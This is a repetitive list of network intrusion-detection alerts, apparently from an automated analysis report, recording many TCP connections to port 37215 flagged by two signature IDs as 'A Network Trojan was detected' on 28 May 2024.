          SID:2829579
          Source Port:33980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923758
          SID:2835222
          Source Port:44872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537699
          SID:2829579
          Source Port:52614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337832
          SID:2829579
          Source Port:39850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708318
          SID:2835222
          Source Port:36698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266627
          SID:2829579
          Source Port:52150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620352
          SID:2829579
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223112
          SID:2829579
          Source Port:39526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930513
          SID:2835222
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268320
          SID:2835222
          Source Port:37306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285451
          SID:2829579
          Source Port:34148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157103
          SID:2829579
          Source Port:60874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226021
          SID:2835222
          Source Port:53648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.175476
          SID:2829579
          Source Port:55578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970205
          SID:2835222
          Source Port:37662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325953
          SID:2829579
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102234
          SID:2829579
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562094
          SID:2829579
          Source Port:53766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744441
          SID:2835222
          Source Port:38782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550752
          SID:2829579
          Source Port:46984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794876
          SID:2829579
          Source Port:42816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178100
          SID:2835222
          Source Port:48234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652956
          SID:2835222
          Source Port:45590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.618927
          SID:2835222
          Source Port:46170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807898
          SID:2835222
          Source Port:54758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297289
          SID:2835222
          Source Port:42206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625669
          SID:2835222
          Source Port:52276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659746
          SID:2829579
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167583
          SID:2835222
          Source Port:53850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859124
          SID:2829579
          Source Port:47694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840197
          SID:2835222
          Source Port:58978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743307
          SID:2835222
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214012
          SID:2829579
          Source Port:35410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859193
          SID:2835222
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592107
          SID:2829579
          Source Port:45160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.564102
          SID:2829579
          Source Port:33832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614691
          SID:2829579
          Source Port:45130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209028
          SID:2835222
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299588
          SID:2829579
          Source Port:45664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536749
          SID:2829579
          Source Port:58812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594977
          SID:2829579
          Source Port:54660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964206
          SID:2835222
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845852
          SID:2829579
          Source Port:39104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876724
          SID:2829579
          Source Port:38368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629145
          SID:2829579
          Source Port:56694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599223
          SID:2829579
          Source Port:42068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326618
          SID:2835222
          Source Port:54928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111341
          SID:2829579
          Source Port:36902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399207
          SID:2829579
          Source Port:47952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922649
          SID:2829579
          Source Port:33194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553912
          SID:2835222
          Source Port:55162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797384
          SID:2829579
          Source Port:40640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403349
          SID:2829579
          Source Port:43290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878575
          SID:2835222
          Source Port:36402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770867
          SID:2835222
          Source Port:59272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202226
          SID:2835222
          Source Port:36470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622152
          SID:2835222
          Source Port:44282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290584
          SID:2835222
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266448
          SID:2835222
          Source Port:52682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766450
          SID:2835222
          Source Port:33094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728769
          SID:2835222
          Source Port:41178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107362
          SID:2835222
          Source Port:58638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424494
          SID:2829579
          Source Port:44132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020592
          SID:2835222
          Source Port:34680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211306
          SID:2835222
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804125
          SID:2829579
          Source Port:52874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326552
          SID:2835222
          Source Port:39672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852670
          SID:2829579
          Source Port:33218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671347
          SID:2829579
          Source Port:60840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.040858
          SID:2829579
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152156
          SID:2835222
          Source Port:37494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677676
          SID:2829579
          Source Port:48326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213414
          SID:2835222
          Source Port:58342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400871
          SID:2829579
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.149980
          SID:2835222
          Source Port:42904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358277
          SID:2835222
          Source Port:33044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803629
          SID:2835222
          Source Port:38706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.108207
          SID:2835222
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876964
          SID:2835222
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923607
          SID:2835222
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415987
          SID:2829579
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299853
          SID:2829579
          Source Port:57992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291740
          SID:2835222
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512328
          SID:2835222
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590928
          SID:2829579
          Source Port:33168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976426
          SID:2835222
          Source Port:52146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068480
          SID:2829579
          Source Port:53268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183756
          SID:2829579
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756402
          SID:2835222
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593335
          SID:2829579
          Source Port:34682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487955
          SID:2835222
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369163
          SID:2835222
          Source Port:51154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186065
          SID:2829579
          Source Port:34230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231626
          SID:2829579
          Source Port:51596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532805
          SID:2829579
          Source Port:52824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294647
          SID:2829579
          Source Port:39308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266666
          SID:2829579
          Source Port:52594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.658988
          SID:2835222
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208251
          SID:2835222
          Source Port:51322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175804
          SID:2835222
          Source Port:58958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183820
          SID:2829579
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743676
          SID:2835222
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283782
          SID:2829579
          Source Port:45368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680137
          SID:2835222
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103273
          SID:2829579
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116938
          SID:2835222
          Source Port:39710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217155
          SID:2829579
          Source Port:58676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923215
          SID:2829579
          Source Port:40806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065351
          SID:2835222
          Source Port:36056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526735
          SID:2835222
          Source Port:45666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736706
          SID:2835222
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290316
          SID:2829579
          Source Port:37252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977356
          SID:2829579
          Source Port:48284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590667
          SID:2835222
          Source Port:60912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626911
          SID:2835222
          Source Port:49122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.987861
          SID:2835222
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178416
          SID:2835222
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766450
          SID:2835222
          Source Port:51836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154636
          SID:2835222
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147413
          SID:2835222
          Source Port:48434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268750
          SID:2829579
          Source Port:54718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744623
          SID:2835222
          Source Port:54810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989746
          SID:2829579
          Source Port:50748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666992
          SID:2835222
          Source Port:41288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084262
          SID:2835222
          Source Port:49944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464333
          SID:2835222
          Source Port:50300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671919
          SID:2829579
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.324875
          SID:2829579
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167697
          SID:2829579
          Source Port:37116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143137
          SID:2835222
          Source Port:48482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171919
          SID:2829579
          Source Port:56258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873566
          SID:2835222
          Source Port:50828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622202
          SID:2835222
          Source Port:47430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925908
          SID:2829579
          Source Port:33618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213736
          SID:2835222
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142487
          SID:2835222
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143121
          SID:2829579
          Source Port:44884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299736
          SID:2835222
          Source Port:59518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068148
          SID:2835222
          Source Port:46670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722055
          SID:2829579
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267987
          SID:2835222
          Source Port:40462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743517
          SID:2829579
          Source Port:55602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.428399
          SID:2829579
          Source Port:34012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941431
          SID:2829579
          Source Port:57378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369167
          SID:2835222
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126804
          SID:2829579
          Source Port:58474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090752
          SID:2829579
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781357
          SID:2829579
          Source Port:42178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197344
          SID:2835222
          Source Port:41186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.162127
          SID:2829579
          Source Port:58514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178940
          SID:2835222
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941469
          SID:2835222
          Source Port:37168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923200
          SID:2829579
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278106
          SID:2829579
          Source Port:58476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466461
          SID:2835222
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212804
          SID:2835222
          Source Port:60836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061401
          SID:2835222
          Source Port:60954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244942
          SID:2829579
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214468
          SID:2835222
          Source Port:38216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553952
          SID:2829579
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291712
          SID:2829579
          Source Port:52484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743514
          SID:2829579
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.089809
          SID:2829579
          Source Port:56272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464440
          SID:2829579
          Source Port:35388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594188
          SID:2829579
          Source Port:38040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228362
          SID:2835222
          Source Port:38220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044748
          SID:2835222
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160152
          SID:2829579
          Source Port:32794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125690
          SID:2829579
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183051
          SID:2835222
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.338039
          SID:2835222
          Source Port:54570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815773
          SID:2829579
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341991
          SID:2829579
          Source Port:58854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655902
          SID:2829579
          Source Port:54484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138522
          SID:2829579
          Source Port:41632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152848
          SID:2829579
          Source Port:48642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474873
          SID:2829579
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195547
          SID:2829579
          Source Port:40770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170550
          SID:2829579
          Source Port:54444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227053
          SID:2829579
          Source Port:42492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268576
          SID:2829579
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975012
          SID:2829579
          Source Port:35922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336650
          SID:2829579
          Source Port:40576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631630
          SID:2835222
          Source Port:57486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464173
          SID:2829579
          Source Port:46240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170686
          SID:2835222
          Source Port:37436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889930
          SID:2835222
          Source Port:51640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878355
          SID:2829579
          Source Port:47452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953408
          SID:2835222
          Source Port:40798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022961
          SID:2835222
          Source Port:52020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594595
          SID:2835222
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297329
          SID:2829579
          Source Port:48624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.796848
          SID:2829579
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544803
          SID:2835222
          Source Port:42238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170252
          SID:2829579
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976652
          SID:2829579
          Source Port:44890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664980
          SID:2829579
          Source Port:50032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991983
          SID:2829579
          Source Port:56986
          Destination Port:37215
